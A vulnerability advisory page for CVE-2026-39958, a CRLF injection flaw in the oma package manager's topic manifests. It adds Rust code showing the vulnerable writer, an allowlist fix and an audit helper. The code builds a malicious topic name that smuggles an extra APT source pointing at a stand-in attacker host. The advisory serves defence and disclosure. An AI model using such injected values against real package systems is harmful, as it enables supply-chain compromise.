CVE-2026-39958
Published: 09 April 2026
Summary
CVE-2026-39958 is a critical-severity CRLF injection (CWE-93) vulnerability in oma, the package manager for AOSC OS. Its CVSS base score is 9.1 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Compromise Software Supply Chain (T1195.002); ranked at the 17.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
SI-10 (Information Input Validation): directly mandates validation of untrusted inputs such as the name field in remote Topic Manifests, blocking malformed data from injecting malicious APT source entries.
SI-2 (Flaw Remediation): requires timely identification, reporting and patching of flaws in the oma package manager, such as updating to version 1.25.2, which adds the transliteration check on the name field.
CM-3 (Configuration Change Control): enforces change control for files such as /etc/apt/sources.list.d/atm.list so that additions of repository sources are authorized and reviewed.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The vulnerability allows a remote attacker controlling a repository mirror to inject unauthorized/malicious APT source entries into /etc/apt/sources.list.d/ via malformed Topic Manifests, directly enabling compromise of the software supply chain to facilitate installation of malicious packages.
NVD Description
oma is a package manager for AOSC OS. Prior to 1.25.2, oma-topics is responsible for fetching metadata for testing repositories (topics) named "Topic Manifests" ({mirror}/debs/manifest/topics.json) from remote repository servers, registering them as APT source entries. However, the name field in said metadata was not checked for transliteration. In this case, a malicious party may supply a malformed Topic Manifest, which may cause malicious APT source entries to be added to /etc/apt/sources.list.d/atm.list as oma-topics finishes fetching and registering metadata. This vulnerability is fixed in 1.25.2.
Deeper analysis
CVE-2026-39958 is a vulnerability in the oma package manager for AOSC OS, specifically affecting the oma-topics component prior to version 1.25.2. oma-topics fetches metadata known as "Topic Manifests" from remote repository servers at paths like {mirror}/debs/manifest/topics.json and registers them as APT source entries. The name field in these manifests is not checked for transliteration issues, allowing malformed manifests to inject unauthorized entries into /etc/apt/sources.list.d/atm.list during the fetching and registration process. The vulnerability is rated at CVSS 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H) and maps to CWE-93.
A remote attacker who can supply a malformed Topic Manifest—such as by controlling a mirror or testing repository—can exploit this with network access, low complexity, no privileges, and no user interaction. Successful exploitation causes oma-topics to add attacker-controlled APT source entries to the system's sources list, potentially enabling the installation of malicious packages and compromising system integrity and availability.
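The injection path described above, together with the input-validation and change-control mitigations listed under Mitigating Controls, as an added example in Rust (oma's implementation language) that is not oma's own code: a manifest name carrying CR/LF characters is interpolated straight into an APT sources line and turns into a second, attacker-chosen "deb" entry; an allowlist check on the name stops that, and an audit helper flags entries in an existing atm.list that point outside the expected mirror. The struct, the function names, the mirror URL and the malicious name are all constructed for illustration, and the allowlist is an assumed conservative check, not the exact check oma 1.25.2 applies (which this page does not spell out).

```rust
// Added example, not oma's code: a Topic Manifest "name" carrying CR/LF
// characters is written straight into an APT sources list and thereby
// injects an extra "deb" line (the CWE-93 pattern), next to the checks a
// hardened writer would apply. Struct, function and mirror names are assumed.

/// One topic entry as it would look after the manifest JSON has been parsed.
/// JSON parsing is left out; only the rendering step matters here.
#[derive(Debug, Clone)]
pub struct Topic {
    pub name: String,
}

/// Unchecked rendering: the topic name is interpolated verbatim, so a name
/// containing "\r\n" becomes a line break followed by attacker-chosen text.
pub fn render_entry_unchecked(mirror: &str, topic: &Topic) -> String {
    format!("deb {}/debs {} main\n", mirror, topic.name)
}

/// Allowlist for a topic name: non-empty ASCII letters, digits, '-', '_', '.'.
/// This rejects CR, LF, whitespace and every non-ASCII character (including
/// Unicode line separators), so a name can never span more than one line.
/// The exact check oma 1.25.2 applies is not on this page; this is an assumed
/// conservative equivalent.
pub fn is_valid_topic_name(name: &str) -> bool {
    !name.is_empty()
        && name
            .bytes()
            .all(|b| b.is_ascii_alphanumeric() || matches!(b, b'-' | b'_' | b'.'))
}

/// Hardened rendering: refuse to emit anything for a name that fails the allowlist.
pub fn render_entry_checked(mirror: &str, topic: &Topic) -> Result<String, String> {
    if !is_valid_topic_name(&topic.name) {
        return Err(format!("rejected topic name {:?}", topic.name));
    }
    Ok(render_entry_unchecked(mirror, topic))
}

/// Number of "deb" source lines in a rendered sources file.
pub fn count_source_lines(content: &str) -> usize {
    content
        .lines()
        .filter(|l| l.trim_start().starts_with("deb "))
        .count()
}

/// Audit helper for an existing atm.list: returns every "deb" line whose URL
/// does not start with the expected mirror, which is what an injected entry
/// from a malicious manifest looks like after the fact.
pub fn find_foreign_entries(content: &str, expected_mirror: &str) -> Vec<String> {
    content
        .lines()
        .map(str::trim)
        .filter(|l| l.starts_with("deb "))
        .filter(|l| {
            // the second whitespace-separated field is the repository URL
            l.split_whitespace()
                .nth(1)
                .map_or(true, |url| !url.starts_with(expected_mirror))
        })
        .map(str::to_string)
        .collect()
}

fn main() {
    let mirror = "https://repo.example.org"; // assumed mirror URL
    // Constructed malicious topic name: a plausible name, then CRLF, then a
    // second source line pointing at an attacker-controlled host.
    let evil = Topic {
        name: "stable\r\ndeb https://evil.example/debs pwned".to_string(),
    };
    let benign = Topic { name: "rust-1.80".to_string() };

    let written = render_entry_unchecked(mirror, &evil);
    println!("unchecked output:\n{}", written);
    println!("source lines written: {}", count_source_lines(&written)); // 2, not 1
    println!("foreign entries: {:?}", find_foreign_entries(&written, mirror));

    println!("checked (evil):   {:?}", render_entry_checked(mirror, &evil));
    println!("checked (benign): {:?}", render_entry_checked(mirror, &benign));
}
```

The unchecked writer turns one manifest entry into two APT sources, the second fetching from the attacker's host; the checked writer returns an error for the same input and writes nothing. The audit helper is the practical form of the change-control mitigation: run it over the real atm.list with the mirror the system is supposed to use and treat any returned line as an unauthorized source to be reviewed.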
The vulnerability is fixed in oma version 1.25.2. Mitigation details are provided in the GitHub security advisory at GHSA-86jc-7r6q-cr3f, pull request #733, commit b361c0f219bbf91a684610c76210f71f093dbc18, and the release notes for v1.25.2. Security practitioners should ensure systems update to at least version 1.25.2.
Details
- CWE(s)